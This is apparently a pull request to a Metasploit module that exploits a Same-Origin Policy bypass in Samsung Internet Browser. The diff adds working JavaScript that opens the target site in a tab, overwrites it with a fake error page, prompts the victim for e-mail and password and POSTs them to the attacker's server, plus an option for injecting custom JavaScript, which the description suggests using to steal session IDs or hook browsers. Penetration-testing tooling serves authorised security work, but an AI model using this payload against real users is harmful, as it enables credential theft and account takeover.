### PR TITLE
Actually save creds, or fail through sanely

### DIFF
--- a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb
+++ b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb
@@ -121,7 +121,6 @@ class MetasploitModule < Msf::Auxiliary
     if not u.nil? and not u.empty? and not p.nil? and not p.empty?
       print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}")
       store_cred(u,p)
-      # Do some cred storage here
     else
       print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}")
     end

--- a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb
+++ b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb
@@ -14,10 +14,8 @@ class MetasploitModule < Msf::Auxiliary
         'Description'    => %q(
           This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the
           Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices.
-          It initiates a server-redirect to a child tab using the document.body.innerHTML
-          function, which causes the child tab to create a fake pop-up. This pop-up prompts the user
-          for a username and password which appears to originate from the targeted URL's domain. Once
-          entered, the credentials are passed to the parent tab as well as stored locally.
+          By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather
+          credentials via a fake pop-up.
         ),
         'License'        => MSF_LICENSE,
         'Author'         => [
@@ -46,12 +44,40 @@ class MetasploitModule < Msf::Auxiliary
         "HTML to display to the victim.",
         'This page has moved. Please <a href="#">click here</a> redirect your browser.'
       ]),
-
     ])
+
+  register_advanced_options([
+    OptString.new('CUSTOM_JS', [
+      false,
+      "Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.",
+      ''
+    ])
+  ])
+
   end
 
   def run
     exploit # start http server
+  end
+
+  def evil_javascript
+    if not datastore['CUSTOM_JS'].nil? and not datastore['CUSTOM_JS'].empty?
+      js = datastore['CUSTOM_JS']
+    else
+      js = <<-EOS
+        setTimeout(function(){
+          x.document.body.innerHTML='<h1>404 Error</h1>'+
+          '<p>Oops, something went wrong.</p>';
+          a=x.prompt('E-mail','');
+          b=x.prompt('Password','');
+          var cred=JSON.stringify({'user':a,'pass':b});
+          var xmlhttp = new XMLHttpRequest;
+            xmlhttp.open('POST', window.location, true);
+            xmlhttp.send(cred);
+          }, 3000);
+      EOS
+    end
+    return js
   end
 
   def setup
@@ -61,16 +87,7 @@ class MetasploitModule < Msf::Auxiliary
         <script>
         function go(){
           var x = window.open('#{datastore['TARGET_URL']}');
-          setTimeout(function(){
-            x.document.body.innerHTML='<h1>Please login</h1>'+
-            '<p>Oops, something went wrong. Please re-enter your username/e-mail address and password.</p>';
-            a=x.prompt('E-mail','');
-            b=x.prompt('Password','');
-            var creds=JSON.stringify({'user':a,'pass':b});
-            var xmlhttp = new XMLHttpRequest;
-              xmlhttp.open('POST', window.location, true);
-              xmlhttp.send(creds);
-            }, 3000);
+          #{evil_javascript}
           }
         </script>
         <body onclick="go()">
@@ -79,15 +96,35 @@ class MetasploitModule < Msf::Auxiliary
       EOS
   end
 
-  # TODO: This does not actually save the credential, since it's gathered from the user
-  # and there's no real solid way to associate it with the domain part of the target_url.
-  # Suggestions welcome if this should be saved with store_loot or just make a guess on the
-  # target.
+  def store_cred(username,password)
+    credential_data = {
+      origin_type: :import,
+      module_fullname: self.fullname,
+      filename: 'msfconsole',
+      workspace_id: myworkspace_id,
+      service_name: 'web_service',
+      realm_value: datastore['TARGET_URL'],
+      realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+      private_type: :password,
+      private_data: password,
+      username: username
+    }
+    create_credential(credential_data)
+  end
+
+  # This assumes the default schema is being used.
+  # If it's not that, it'll just display the collected POST data.
   def collect_data(request)
-    creds = JSON.parse(request.body)
-    u = creds['user']
-    p = creds['pass']
-    print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}")
+    cred = JSON.parse(request.body)
+    u = cred['user']
+    p = cred['pass']
+    if not u.nil? and not u.empty? and not p.nil? and not p.empty?
+      print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}")
+      store_cred(u,p)
+      # Do some cred storage here
+    else
+      print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}")
+    end
   end
 
   def on_request_uri(cli, request)


### PR DESCRIPTION
This incidentally also allows for a custom collector to be implemented by the user -- for example, if they'd rather pick up a session ID or inject a browser hook or something along those lines. It's a little clunky, using the advanced option of CUSTOM_JS, but it seems to work fine. I can talk about it in the documentation.

@RootUp , please test this on your vulnerable browser. You should be able to see the saved creds at the end with a `creds` command.